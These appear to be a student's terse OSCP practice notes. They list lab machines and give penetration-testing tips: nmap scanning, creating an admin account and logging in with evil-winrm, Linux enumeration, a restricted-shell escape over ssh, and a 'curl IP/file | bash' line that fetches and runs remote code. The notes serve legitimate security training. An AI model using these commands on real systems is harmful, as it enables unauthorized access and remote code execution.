Notes
God notes
PG boxes on OSCP:
https://defaultcredentials.com/oscp/best-active-directory-practice-for-oscp/
Heist, Hutch, Vault in PG Practice, Resourced
HTB:
APT, Fuse, Cascade, Monteverde, Resolute, Forest, Arkham, Active, Mantis
Cyber Seclabs:
Zero, Secret, Brute, Dictionary, Roast, Spray, Sync, Toast
Always look for config files if you have access to application files!
adds an admin account to the hosts
Try legion script for nmap scanning!
Always do nmap -sC (default scripts)
If you are a service account you can create an admin account.
evil-winrm -i IP -u gori -p 'passwd123!' to log in as the account you just created
net user gori to check privileges
---
/etc/apache2: look for config files
Linux enum
ldd --version
Transfer module
curl IP/file_name | bash (to execute it)
cat /etc/lsb-release
Transfer method
python -m SimpleHTTPServer 80
-> curl -o outputfile IP/filename
Restricted shell? Try this:
ssh mindy@10.129.29.189 -t "bash --noprofile"
---
Run sudo